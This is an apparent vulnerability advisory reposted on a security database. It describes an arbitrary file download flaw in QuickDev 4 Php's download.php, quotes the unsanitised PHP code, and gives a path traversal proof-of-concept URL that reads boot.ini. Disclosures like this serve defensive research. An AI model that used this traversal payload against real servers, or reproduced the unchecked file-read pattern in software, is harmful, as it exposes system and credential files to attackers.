##################################################################################### [+] QuickDev 4 Php (download.php file) Arbitrary File Download [+] Discovered By SirGod [+] http://insecurity-ro.org [+] http://h4cky0u.org ##################################################################################### [+] Download : http://sourceforge.net/projects/quickdev4php/files/ [+] Arbitrary File Download - Vulnerable code in download.php -------------------------------------------------------------------------- $file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file']; header("Pragma: public"); header("Expires: 0"); header("Cache-Control: must-revalidate, post-check=0, pre-check=0"); header("Content-Type: application/force-download"); header( "Content-Disposition: attachment; filename=".basename($file)); //header( "Content-Description: File Transfer"); @readfile($file); die(); -------------------------------------------------------------------------- - PoC http://127.0.0.1/download.php?file=../../../../../../boot.ini ##################################################################################### # sebug.net
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论